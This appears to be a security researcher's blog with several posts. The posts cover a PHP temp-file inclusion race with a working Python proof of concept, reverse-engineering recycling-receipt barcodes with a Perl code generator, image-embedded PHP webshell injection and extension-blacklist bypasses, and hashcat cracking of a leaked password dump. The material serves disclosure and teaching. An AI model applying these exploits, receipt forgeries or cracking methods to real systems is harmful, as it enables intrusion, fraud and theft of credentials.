from urllib import request, parse
 
def main():
 
    target = 'http://10.11.12.69/test.php?file=../tmp/'
    tmpFiles = ['php1.tmp', 'php1A00.tmp', 'php1A01.tmp', 'php1A1A.tmp', 'php1A1B.tmp', 'php1A.tmp', 'php1B.tmp']
 
    while True:
        for tmp in tmpFiles:
            if 'ThisShouldNotExist' in doRequest(target + tmp):
                print("Code executed")
                exit()
 
 
def doRequest(target):
    while True:
        try:
            req = request.Request(target)
            resp = request.urlopen(req)
            return resp.read().decode('UTF-8')
        except:
            pass
 
    return ''
 
if __name__ == '__main__':
    main()

And then we run the two tools, wait a little while and see the result. Notice how small the files are, to make the process quicker; we are not interested in sending a lot of data to the server this time. Of course this could all be optimized greatly. Right now the Hera tool will upload the set of files like normal. A more optimal solution would be to have Hera upload a set of files and then restart the attack, so that a new set of tmp files gets created on the server, raising the chance of one of our guessed tmp file names being created.

./hera 10.11.12.69 80 100 2 /index.php 0.001 20 0 0 40
~=Hera 0.8=~

[+][2016-10-28 17:23:17] Building payload
[+][2016-10-28 17:23:17] Starting threads
time python3 LocalExecPoC.py
Code executed

real 0m49.778s
user 0m5.528s
sys 0m0.828s

Now, this was on Windows, and the code for creating temporary files in mod_php differs depending on the operating system. The default function on Linux is more secure, but could still be attacked (although it would take a lot more time). I will build a proof of concept for the Linux scenario as well, and update this article when it’s finished. But for now you will have to be satisfied with these results :-).

As you can see in the image above, the names on Linux are more random and also longer, making them a lot harder to guess. The code below shows some Windows-specific code related to the creation of the temporary file; the complete code can be found at the link below.

https://github.com/php/php-src/blob/6053987bc27e8dede37f437193a5cad448f99bce/main/php_open_temporary_file.c#L165

#ifdef PHP_WIN32
cwdw = php_win32_ioutil_any_to_w(new_state.cwd);
pfxw = php_win32_ioutil_any_to_w(pfx);
if (!cwdw || !pfxw) {
    free(cwdw);
    free(pfxw);
    efree(new_state.cwd);
    return -1;
}

if (GetTempFileNameW(cwdw, pfxw, 0, pathw)) {

Linux uses the mkstemp function to create the random strings for its file names. This is pretty secure, but not foolproof. As mentioned earlier, I will update this article when I have test data for this scenario as well. More to come.
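
To get a feel for the difference between the two schemes, here is a rough comparison of the search spaces (the Windows figure assumes GetTempFileNameW only encodes a 16-bit value as up to four hex digits, which is how I read the API; the observed php1A00.tmp style names match that):

windows = 0xFFFF       # "php" + up to 4 hex digits + ".tmp"
linux   = 62 ** 6      # mkstemp(): 6 characters from [A-Za-z0-9]
print(windows)         # 65535 candidate names - brute forceable
print(linux)           # 56800235584 - several orders of magnitude harder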

UPDATE – 161129: I’ve tried to contact the PHP security team about this (twice) and have not received a single response. I have therefore decided to just post this now and all future results relating to this issue.

Having some fun with reverse vending machines – part 2

Alright, so I managed to get a few more receipts!

I got one receipt from the same store as before, and one receipt from another store (with the same kind of machine, from the looks of it at least).
We can start with the receipt from the new store, as I’m not going to go very deep into that one at the moment.

I recycled one can in that store, and the EAN code on the receipt was

9 801104 699975

From this we can’t really get much info, other than that one of the following parts is the important one to identify first (since we got 1 SEK from that can):

9 801104 699975
or
9 801104 699975

Another important thing to note is the maker and model of the machines.

The first store I went to uses a “Tomra T-83 HCpIII”, while the new store I went to today uses a “Tomra T-83 HCpII”.
On the Tomra website they only advertise a “Tomra T-83 HCp”, so the III and II might be yearly models or firmware versions (since they are not visible on the machine, only on the receipt). I’ll see if I can dig out some more information about that.

Tomra T-83 HCp website
Tomra T-83 HCp PDF


So the first “light” conclusion we can draw here today is that the receipts can’t be used across stores, even if the stores are using the same machines.
Although the exact mechanism behind this is still unknown, I have some theories:

  • The store can decide the structure of the EAN code themselves
  • The manufacturer decides the structure per customer (meaning that it could be the same structure in the same chain of stores, although I have to confirm this later)
  • The structure of the EAN depends on the firmware version (or on the II and III model numbers, which I have yet to figure out the exact meaning of) – a friend suggested this one

Now, I’m putting that aside for now, since I only have one receipt from there anyway, and I want to finish figuring out the first store before I take on another one. I don’t really see much point in it just yet, other than figuring out which of the above theories is correct.

Like I mentioned before, I have a new receipt from the first store (the main one in this project).
And it looks like this:

7 cans – 1 SEK each
1 bottle – 2 SEK

And the EAN code is:

9 999900 000900

I suggested in the first blog post about this project that it could be 907 (I had taken 900 into consideration, but didn’t actually think it would be that, since it felt the least logical to me, but hey, what the heck). So now that we know this, we have the following list of codes (if you haven’t figured it out yet, the ones in bold are the ones I have so far):

0108
0207
0306
0405
0504
0603
0702
0801
0900
1006
2003

Now that we know all this, we’ll make another assumption.
Since we know 10 and 20, the sequence should probably look something like this:

0108
0207
0306
0405
0504
0603
0702
0801
0900
1006
1105
1204
1303
1402
1501
1600
1706
1805
1904
2003

I don’t understand why they would skip the number 7 here, but this is the only way I can see that 20 gets 3 as its control code.
So my current assumption is that they simply use 0-8 as control numbers for 1-digit values, and 0-6 for 2-digit values.
It doesn’t feel right, and I suspect there’s more to it, but I need more data to draw any other conclusion at the moment.

But just to play around with the thought of this being the case, I made a small Perl script to print the numbers as they might look.
The problem here is that I don’t know what happens when the number reaches a new length in digits (like when it goes from 99 to 100): whether it ignores the fact that the length is new and continues until the control digit reaches 0, or whether it resets right away, even if the control digit for 99 is still at 1, and starts over at 4. I will assume the latter, and then try to get a receipt for 100.

#!/usr/bin/perl
use warnings;
use strict;

my $cont = 8;
my $len = 1;
for(my $i = 1; $i <= 110; ++$i, --$cont)
{
        if($cont < 0 || $len < length($i))
        {
                $len = length($i);
                $cont = 10 - (length($i) * 2);
        }

        printf("%02d0%d\n", $i, $cont); # zero-pad to match the receipt codes above
}

To be continued!

Uploading dangers

A few weeks ago I was reading a forum thread about file upload scripts in PHP. The people in the thread were discussing different ways of handling different file types when allowing users of their websites to upload files to the server. Security wasn’t really the topic, but it was still mentioned. The most common problem brought up when it comes to file uploads is the need to somehow restrict what kinds of files users are allowed to upload, how to handle the files once they are on the server, and so on.

In this case their solution was to disallow users from uploading files with the php extension, and then to verify that the users were uploading valid pictures by using a PHP function called ImageJpeg (the forum user in question was making an image upload script for his community website). Now, as a developer I can see why this seems like a pretty nice idea, since the data is verified and changed by the ImageJpeg function. If the file is not a valid image, the function returns false and the file is not properly uploaded. And even if a malicious user were to put code within the data part of the image, that data would always be changed by the time ImageJpeg has finished and saved the file to disk.

The so-called “blacklisting” of file extensions is usually not a good idea, since there exist many alternatives to any one executable extension. Take the example above, where they prevented users from uploading files with the php extension: PHP has 5 alternative extensions, these being .php3, .php4, .php5, .phtml and .phps. If a developer only restricts .php, then the other 5 can be used instead to upload malicious code to the server.
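
A sketch of why this kind of check fails (the helper name is made up):

BLACKLISTED = ('.php',)

def upload_allowed(filename):
    # naive blacklist: only the exact ".php" suffix is blocked
    return not filename.lower().endswith(BLACKLISTED)

print(upload_allowed("shell.php"))    # False - blocked
print(upload_allowed("shell.phtml"))  # True - slips through, and the server may run it as PHP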

I found it an interesting topic and decided to see if I could somehow bypass their protection and upload executable code to my test server using their upload script. The first thing that came to mind was that JPEG images allow so-called “exif” data, which can hold comments for image viewers and editors to display in different ways. That bubble burst rather quickly, though, as I discovered that the ImageJpeg function always overwrites the exif data with its own, including the comments.

So now I had to fire up a hex editor and get to work, to see if I could insert data into the image itself while making sure it was still a valid image that would pass through the ImageJpeg function. The difficulty with this, just as discussed in the thread, was that the data was always changed, and thus my code was not intact when the file was saved to disk. The image would in almost all cases still be valid, although a bit distorted due to my meddling.

After hours of playing around with this, I managed to produce an image where the injected code was still intact and executable on my server after being run through the function.


So after even more hours of trying to perfect this method, making sure the image is always valid and not too distorted by the changes, I wrote a script that injects the code automatically and makes sure the code survives processing by different image handling tools, like the ImageJpeg function (it was also tested with tools that resize the picture, and although this worked in many cases, it was significantly harder to retain the code after that kind of processing).

Below is the picture before the injection

logo

Followed by the picture after the injection (notice how in this example the picture got a little bit distorted at the end; this varies from case to case). Don’t worry, the code can’t execute in its current form.

logo_mod

So to summarize: after a few days I did manage to bypass their protection, and I followed up by writing a script to automate it all. Some example output from the script can be seen below.


[+] Jumping to end byte
[+] Searching for valid injection point
[+] Injection completed successfully
[+] Filename: result.phtml

And to top it off, I also made a small script to send commands to the file once it has been uploaded to a server, parse the results out of the returned image data, and display them.


uname -a
Linux truesechp01 3.13.0-29-generic #53-Ubuntu SMP Wed Jun 4 21:00:20 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

And this shows how very easy it is for things to go wrong with file upload functionality. There are so many ways to do bad things with it, and a motivated attacker can in many cases spend days, months or even years finding a way around your protection mechanisms. The trick I have shown you in this article is not limited to PHP, but can be applied in other environments as well. There are a few measures that can be good enough depending on the situation when handling uploaded files, but there is no silver bullet, as there are in many cases ways to circumvent those measures too. The best example is the developer who simply implements a check wrongly (a classic is only checking for the presence of .jpg in a filename, which allows the upload of a file.jpg.php).
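
That classic mistake, sketched out (hypothetical helper name):

def looks_like_jpeg(filename):
    # broken check: ".jpg" anywhere in the name is accepted
    return '.jpg' in filename

print(looks_like_jpeg("file.jpg.php"))   # True - accepted, yet the server may execute it as PHP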

For those who decide to solve all this by using blacklists and blocking file extensions like .php, .phtml, .php3, .php4 and .php5: be aware, PHP 7 will be released eventually 😉

UPDATE: And PHP 7 is here, and the vulnerability is back 🙂

Your passwords are never really safe

There have been a lot of user credential leaks lately, according to the media. Some of them involve whole user databases with all kinds of credentials, and some involve “only” credit card numbers and so on. It usually depends on what the attackers are after when they break into the servers of the targeted company.

The thing that people don’t always realize is that passwords are being leaked all the time, from hundreds of websites, without us even knowing about it. Some really huge leaks will never see daylight, because the people behind the site never detect the intrusion, and the people behind the attack want to keep it to themselves. Personally, I have a unique email address for every account I create, so that if a site gives out my details to a third party, or if someone breaks into their systems, I’ll know.

Fresh databases with user credentials are worth a lot to many people on the black market, for several reasons:

  • The email addresses can be used for spam
  • The email and password combination can be tried against different services like Facebook or Twitter and used for a number of things (spam being one of them)
  • The passwords can be put into a wordlist and used for cracking other passwords in the future

There have been many cases where website owners haven’t encrypted or hashed the passwords of their users, which makes life a lot easier for the intruder who steals and potentially leaks the information (a lot easier, since there is nothing to crack at all; even very long passwords, which would take an enormous amount of time to brute force, are immediately readable). But of course, today we see in most cases that some sort of encryption or password hashing is used. And even though this is a very positive thing, it doesn’t always help that much. If your password is too short and it has been hashed, then in most cases it is lost. If it has been encrypted then there might still be hope, but that hope rests on the safety of the encryption key. And if the intruder has gotten access to the database, then the key might not be safe either.

The thing about the mind of a hacker that people don’t think about is that a determined hacker won’t stop just because something is complicated or a hassle. If it’s a “hard to exploit” vulnerability, then it is simply a matter of time. And if the hacker thinks it’s worth the trouble, then years can be spent breaking in if needed. It’s the same with these databases. You probably all know about the Adobe intrusion and how all the user information was leaked on the Internet. Those passwords were encrypted, but in a way that does not make them unique, meaning that one password in its encrypted state looks the same for all users who chose the same password. As of this date the database has (as far as we know) not been completely cracked, as the encryption key has not been discovered. But I’m sure that someone somewhere is working on it. Some determined hacker wants to get their hands on that key, and computers are getting faster and faster, so it’s just a matter of time.
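
Adobe used encryption rather than hashing, but the non-uniqueness problem is the same one you get with unsalted hashes, and it is easy to demonstrate:

import hashlib

# Without a per-user salt, everyone who picked "123456" gets the same digest,
# so cracking it once cracks it for every user at once.
for user, pw in [("alice", "123456"), ("bob", "123456"), ("carol", "hunter2")]:
    print(user, hashlib.md5(pw.encode()).hexdigest())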

I would like to demonstrate the typical process of your password getting into the wrong hands. I downloaded the published dump of the eharmony.com password list, with over 1,500,000 password hashes from users of the site. Then I loaded them all into a password cracker called oclHashcat, and within seconds this was the result.


Session.Name...: oclHashcat
Status.........: Running
Input.Mode.....: Mask (?1?1?1?1?1?1) [6]
Hash.Target....: File (/home/cats/eharmony-hashes.txt)
Hash.Type......: MD5
Time.Started...: Wed Aug 13 21:42:11 2014 (4 secs)
Time.Estimated.: Wed Aug 13 22:50:22 2014 (1 hour, 7 mins)
Speed.GPU.#1...: 57925.6 kH/s
Speed.GPU.#2...: 62493.3 kH/s
Speed.GPU.#3...: 63531.4 kH/s
Speed.GPU.#4...: 42643.3 kH/s
Speed.GPU.#*...: 226.6 MH/s
Recovered......: 73454/1513805 (4.85%) Digests, 0/1 (0.00%) Salts
Progress.......: 738197504/735091890625 (0.10%)
Skipped........: 0/738197504 (0.00%)
Rejected.......: 0/738197504 (0.00%)
HWMon.GPU.#1...: 38% Util, 52c Temp, 43% Fan
HWMon.GPU.#2...: 36% Util, 48c Temp, 36% Fan
HWMon.GPU.#3...: 31% Util, 49c Temp, 45% Fan
HWMon.GPU.#4...: 33% Util, 47c Temp, 36% Fan

As you can see, 73454 passwords were recovered within 5 seconds. After 2 minutes the status was “388429/1513805 (25.66%)”. And this is by sheer brute force (I usually start with brute force when cracking MD5, since it’s so fast anyway); I hadn’t even started using my wordlists yet. By getting all these passwords in clear text, I expand my wordlist database with more real user passwords that can be used in attacks later on. After about 1 hour I decided to stop the brute forcing and try a wordlist instead.
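
That estimate is easy to sanity-check: the Progress total above, 735091890625, is exactly 95^6, i.e. a six-character mask over the 95 printable ASCII characters.

keyspace = 95 ** 6            # 735091890625, matches the Progress line above
speed = 226.6e6               # combined rate of the four GPUs (H/s)
print(keyspace / speed / 60)  # ~54 minutes to exhaust the whole mask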

As you can see in this result, there is one GPU less. That is because one graphics card broke during the brute forcing of the passwords. I have disconnected the damaged card for now, until I can take a closer look and see whether it can still be used. Anyway, as you can see, after only 5 minutes we have cracked 106794 passwords with the wordlist, leaving about 676732 still unsolved. Now, this list of passwords has already been cracked once by someone else, so I won’t go for 100%.


Session.Name...: oclHashcat
Status.........: Exhausted
Input.Mode.....: File (../dics/crackstation.txt)
Hash.Target....: File (/home/cats/eharmony-hashes.txt)
Hash.Type......: MD5
Time.Started...: Thu Aug 14 08:30:44 2014 (5 mins, 51 secs)
Time.Estimated.: 0 secs
Speed.GPU.#1...: 3204.3 kH/s
Speed.GPU.#2...: 2937.5 kH/s
Speed.GPU.#3...: 2942.3 kH/s
Speed.GPU.#*...: 9084.1 kH/s
Recovered......: 106794/783526 (13.63%) Digests, 0/1 (0.00%) Salts
Progress.......: 1167547735/1167547735 (100.00%)
Skipped........: 0/1167547735 (0.00%)
Rejected.......: 14082514/1167547735 (1.21%)
HWMon.GPU.#1...: 29% Util, 49c Temp, 40% Fan
HWMon.GPU.#2...: 64% Util, 48c Temp, 35% Fan
HWMon.GPU.#3...: 64% Util, 45c Temp, 37% Fan

So to summarize: pick long and complex passwords, preferably unique ones for every site you register at. Personally I try to make up rules in my head for my passwords, and then I make up phrases for them. “Ch1ldOfL1ght1s@Gre@tG@me” is an example of a good password. Length is better than complexity, but it’s even better if you can mix in both. Also, if a site gets hacked and you have an account there, don’t trust that they have encrypted or hashed your passwords correctly. If it’s an important password that you have used in several places, then you should always assume the worst and change it as soon as possible.

When security is not taken seriously

So, I have had this project going on for a while now, where I’m trying to track a script kiddie who has been using sqlmap to hack literally hundreds of websites for about half a year. He then proceeds to publish information about the sites he has broken into, and while doing so shows a lot of signs of inexperience in the field. I don’t want to go too deep into the details of this little project, for fear of alerting the person in question. But I do want to talk briefly about a recent incident, directly related to the project, that shows what can happen when security is not taken seriously.

A few days ago I checked the list of websites the guy has hacked. I noticed that he had added a bunch of new sites, and stated for some of them that he had only checked the database names and a list of the tables in them. According to him, he had not extracted any other sensitive information. Reading this, I proceeded to quickly contact the affected websites (I always do this, but I do it faster when I think the data on the servers hasn’t been touched yet) in the hope of preventing any further damage. I use a template for all contact with sites in this project, and I have even been reported for spamming by one of the companies. Ungrateful as that may sound, I understand their reaction.

Among the sites I contacted, one was especially quick to reply to my e-mail, stating that this incident had nothing to do with them and did not affect their website or business. I was surprised at first, and thought that I might have made some error and contacted the wrong company. After double and triple checking, I replied to the e-mail and asked if the website (including the link to the affected site) was indeed theirs. It should be noted that if their website’s address was “verylegitimatewebsite.tld”, then the contact address I was sending my e-mails to was “info@verylegitimatewebsite.tld”.

This is how I think a lot of people see IT security consultants these days, when we try to tell them that security needs to be taken more seriously.

After a while the person on the other end responded that the site did indeed belong to them.
I’m not sure what brought on the first reply that it had nothing to do with them, but it became clear to me that this person had no idea what I was talking about, and didn’t really seem to care either. I wrote a more detailed response, directed specifically at this website (instead of just generally pointing them to the list of affected sites like I usually do to save time), to try to explain the situation and what it all could lead to, damages and so on. I have so far not gotten a response, but I am still eagerly waiting for it.

During our e-mail conversation, their user database was stolen and information about it was published.

Take it seriously folks.